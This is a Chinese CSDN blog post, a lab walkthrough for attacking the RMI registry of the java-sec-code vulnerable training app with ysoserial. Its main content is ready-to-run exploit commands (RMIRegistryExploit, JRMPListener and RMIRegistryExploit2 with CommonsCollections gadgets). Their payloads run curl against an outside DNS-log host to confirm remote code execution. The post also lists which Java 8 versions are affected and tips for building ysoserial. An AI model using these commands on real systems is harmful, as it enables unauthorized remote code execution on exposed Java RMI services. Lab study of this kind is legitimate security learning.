java-sec-code中rmi

最新推荐文章于 2024-11-03 11:01:20 发布
最新推荐文章于 2024-11-03 11:01:20 发布
阅读量503 收藏 12
点赞数 8
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/135153515
版权

java-sec-code中rmi
暂时没有搞懂原理,这里只说明利用方法
java-sec-code
作者给出的是使用ysoserial进行利用
测试环境搭建
docker环境下,1099端口默认不开启,这里使用idea运行org.joychou.RMI.Server即可
个人电脑java环境分为1.8.381 1.8.043 1.8.121
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
测试Java 1.8.121上下版本不同利用方式,使用https://dig.pm/作为dnslog平台

java1.8.043环境
poc

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit target_ip 1099  CommonsCollections1 "curl xxxx.ipv6.1433.eu.org/aaa"

在这里插入图片描述
dns平台有回显

java1.8.121

利用方式

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'curl d84d55bd53.ipv6.1433.eu.org/rmi'

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit2 192.168.2.3 1099 192.168.2.5 12345

当然了,这两个命令都运行ysoserial-0.0.6-SNAPSHOT-all.jar是没有问题的,区别只在于ysoserial-0.0.6-SNAPSHOT-all.jar是添加了RMIRegistryExploit2,重新打包的,而ysoserial-all.jarysoserial作者提供的原生jar包
在这里插入图片描述
java 1.8.381 利用不了 以目前的java版本来说,本人并没有找到相应的利用方法,可能只是图一乐呵

题外话

https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI

https://github.com/frohoff/ysoserial

编译ysoserial可能会失败,建议在vps上面打包,使用mvn clean package -DskipTests命令进行打包,
打包失败报错,如果显示是javax.interceptor-api:3.1失败的话,将pom.xml里面的version修改为1.2.2即可

<dependency>
			<groupId>javax.interceptor</groupId>
			<artifactId>javax.interceptor-api</artifactId>
			<version>1.2.2</version>
</dependency>
天下是个小趴菜
关注
java-sec-code 反序列化漏洞
weixin_44687621的博客
08-24 689
java的反序列化 序列化的步骤为 创建一个ObjectOutputStream输出流 调用ObjectOutputStream.writeObject 反序列化的步骤为 创建一个ObjectInputStream输出流 调用ObjectInputStream.readObject 示例如下: package com; import java.io.Serializable; public class User implements Serializable { protected St
java-sec-code Fastjson漏洞
weixin_44687621的博客
08-27 1479
最近ctf比赛使用java作为web开发语言的题目越来越多,Fastjson的漏洞是一个很重要的rce。学会审计Fastjson漏洞,更有机会挖出高质量的漏洞,所以还是得多学习学习的。 Fastjson简介 Fastjson是一个Java库,可以用来将Java对象转换成它们的JSON表示。它还可以用于将JSON字符串转换为等效的Java对象。Fastjson可以处理任意Java对象,包括您没有源代码的现有对象。 Fastjson相对其他JSON库的特点是快速且简洁,但是却被屡屡爆出漏洞。 Fastjson可
Java代码审计」代码审计靶场本地搭建「IDAE」
橙留香Park的博客
09-23 6450
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
java rmi register反序列化攻击
Shanfenglan's blog
12-16 1895
文章目录1. 前言2. 利用参考文章 1. 前言 被攻击的是 rmi register服务端,一般在1099端口。如果遇见了暴露的1099端口可以尝试攻击一下。 2. 利用 报错不用管,命令会正常执行 报错不用管,命令会正常执行 #发送给服务器payloads/JRMPLIstener数据,rmi服务器会开启一个服务,攻击者使用JRMPClient与这个服务进行通行进而进行命令执行。 条件jdk<=jdk8u111 java -cp ysoserial.jar ysoserial.exploit.J
java访问windows注册表 method native_code2sec.com/CVE-2017-3241 Java RMI Registry.bind()反序列化漏洞.md at maste...
weixin_39927508的博客
12-22 1261
Title: CVE-2017-3241 Java RMI Registry.bind()反序列化漏洞Date: 2020-08-04 10:20Category: 漏洞实践Tags: Java,RMI,漏洞,反序列化Slug:Authors: bit4wooSummary:CVE-2017-3241 Java RMI Registry.bind()反序列化漏洞如有错误,敬请斧正!漏洞简介简要说明...
攻击Java RMI方式
weixin_50464560的博客
11-26 883
此节总结了打法以及对应的payload或者exp,按本文顺序来,方便健忘以及懒得敲命令的自己,也方便懒得看原理,直接找利用的各位(连代码都不想敲的话建议使用ysomap)探测RMI接口BaRMIe:NMap:略}}攻击Object类型参数接口(仅示例,需要知道接口参数以及调用方式):try {}攻击非Object类型参数接口:1、mvn package 打好jar包2、运行RmiServer。
JAVARMI、JRMP安全解析+RMG工具使用
GalaxySpaceX的博客
06-14 3127
RMI分析和攻击,remote-method-guesser的使用
Java环境配置之Docker
qq_18079589的博客
08-02 342
Docker 容器化 服务器环境 centos 7.6 64位 简单好上手,你值得拥有 一 更新yum 源 执行命令 yum update 查看docker 旧版本 yum list installed |grep docker 有就卸载之前的版本 yum remove 文件名(多个用空格隔开) 一键安装 yum install docker 验证是否安装完毕 docker version 启动并加入开机启动 systemctl start docker systemctl enable do
test-java-monitor
weixin_43890360的博客
07-14 210
建议可以查看某个Web服务进程的文件打开数目,命令为lsof -p | wc -l,也可以查看系统打开文件数目最多的前几个进程,命令为lsof | awk '{print $2}' | sort | uniq -c | sort -nr | head。- `netstat -anp`: 显示所有网络连接的状态 - `grep "$port"`: 查找指定端口号的连接 - `grep $pid`: 查找指定进程ID的连接 - `wc -l`: 统计行数,即符合条件的连接数量。
CodeQL数据库构建原理分析
Chenhui98的博客
08-19 1043
是一个帮助开发者自动完成安全检查、帮助安全研究者进行变异分析的分析引擎。它由代码数据库和代码语义分析引擎组成,通过将代码抽象为数据查询表保存到代码数据库,可以方便地运行代码查询。本文的关注点在于CodeQL是如何生成代码数据库。这里以java作为示例语言进行分析在配置好CodeQL以后,用户目录下的文件夹保存了CodeQL的CLI部分,它的目录结构如下,这里省略了部分无关文件CodeQL的入口文件为codeql,这是一个shell脚本,主要目的就是为调用codeql.jar。...
Java学习(
Lzdnydppx的博客
08-11 912
正则表达式、加密与安全、多线程、Maven基础、网络编程、XML与JSON、JDBC编程、函数式编程、设计模式
Java练习题集
weixin_45135434的博客
01-12 2097
第001题 Java所有类的父类是( )。 A、Father B、Dang C、Exception D、Object 正确答案: D 我的答案: D (正确) 解释:javaObject是所有类的父亲,所有类的对象都是Class的实例。 第002题 在某个类A存在一个方法:void set(int x),以下不能作为这个方法的重载的声明的是() A、void set(int y) B、int set(int x,double y) C、double set(int x,int y) D、void
HashMap为什么线程不安全?
最新发布
rnnf_yyds的博客
11-03 298
HashMap底层是基于数组 + 链表(在 Java 8 以后,当链表长度超过一定阈值时会转换为红黑树)的数据结构。在多线程环境下,当多个线程同时对HashMap进行put操作时,可下面这种情况:假设两个线程 A 和 B 同时执行put操作,它们计算出的插入位置相同(假设为index线程 A 先获取到了当前index位置的节点,在它还没来得及将新节点插入链表(或树)时,线程 B 也获取到了这个位置的节点。
[自用,更新自day5]瑞吉外卖代码及笔记
lapiii的博客
11-01 828
当使用ThreadLocal维护变量时,ThreadLocal为每个使用该变量的线程提供独立的变量副本,所以每一个线程都可以独立地改变自己的副本,而不会影响其它线程所对应的副本。Mybatis Plus公共字段自动填充,也就是在插入或者更新的时候为指定字段赋予指定的值,使用它的好处就是可以统一对这些字段进行处理,避免了重复代码。因为在分页查询的Dish的records(菜品记录),只有这个菜品所属的categoryId,但是我们需要分页的时候展示的是菜品名字。
基于vue框架的的汇生活家居商城的设计与实现bdjlq(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
10-29 1394
项目功能:商品分类,商品信息,用户。
JAVA 插入 JSON 对象到 PostgreSQL
qq_52143611的博客
10-30 905
在现代软件开发,由于 JSON 数据的轻量和通用性,处理 JSON 数据已经变得无处不在。PostgreSQL凭借其对 JSON 的强大支持,为存储和查询 JSON 数据提供了出色的平台。为了将JSON数据保存到PostgreSQL数据库,我们可以将JSON数据转换为PostgreSQL的JSONB类型数据,然后将其存储在数据库。在Java,我们可以使用JDBC或者基于ORM框架的方式来实现这一功能。
SpringSession源码分析
lkr_lkr的博客
11-01 273
默认对常规Session的理解和使用,如何使用Set-Cookie。
spring6 笔记(3 万字详解)
2301_79083000的博客
10-29 1287
尚硅谷spring笔记带你一套掌握spring
函数式接口与回调函数实践
m0_37635053的博客
10-29 412
函数式接口与回调函数
java-rmi 漏洞
07-14
Java RMI(远程方法调用)是一种用于在分布式系统进行远程通信的Java API。虽然它提供了方便的远程方法调用功能,但也存在一些安全漏洞。 其一个漏洞是未经授权的远程方法调用(Unauthorized Remote Method ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值